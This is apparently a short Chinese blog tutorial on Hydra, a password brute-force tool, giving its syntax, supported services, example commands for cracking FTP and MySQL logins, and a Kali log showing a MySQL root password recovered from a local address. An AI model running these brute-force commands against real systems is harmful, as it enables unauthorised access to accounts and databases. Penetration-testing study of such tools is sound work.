强力密码暴力破解工具:hydra
语法:
hydra [[[-l LOGIN|-L FILE] [-p PASS|-P FILE]] | [-C FILE]] [-e nsr] [-o FILE] [-t TASKS] [-M FILE [-T TASKS]] [-w TIME] [-W TIME] [-f] [-s PORT] [-x MIN:MAX:CHARSET] [-SuvV46] [service://server[:PORT][/OPT]]
支持服务:
asterisk cisco cisco-enable cvs firebird ftp ftps http[s]-{head|get} http[s]-{get|post}-form http-proxy http-proxy-urlenum icq imap[s] irc ldap2[s] ldap3[-{cram|digest}md5][s] mssql mysql nntp oracle-listener oracle-sid pcanywhere pcnfs pop3[s] postgres rdp rexec rlogin rsh sip smb smtp[s] smtp-enum snmp socks5 ssh sshkey svn teamspeak telnet[s] vmauthd vnc xmpp
例子:
破解FTP:
hydra -l user -P passlist.txt ftp://192.168.0.1
破解MYSQL
hydra -l user -P passlist.txt 192.168.0.1 mysql
root@kali:~# hydra -l root -P password2.txt 172.18.20.18 mysql Hydra v8.6 (c) 2017 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes. Hydra (http://www.thc.org/thc-hydra) starting at 2019-01-14 20:01:16 [INFO] Reduced number of tasks to 4 (mysql does not like many parallel connections) [DATA] max 4 tasks per 1 server, overall 4 tasks, 12 login tries (l:1/p:12), ~3 tries per task [DATA] attacking mysql://172.18.20.18:3306/ [3306][mysql] host: 172.18.20.18 login: root password: weifengksl123456 1 of 1 target successfully completed, 1 valid password found Hydra (http://www.thc.org/thc-hydra) finished at 2019-01-14 20:01:16
版权声明:本文为weifeng1463原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。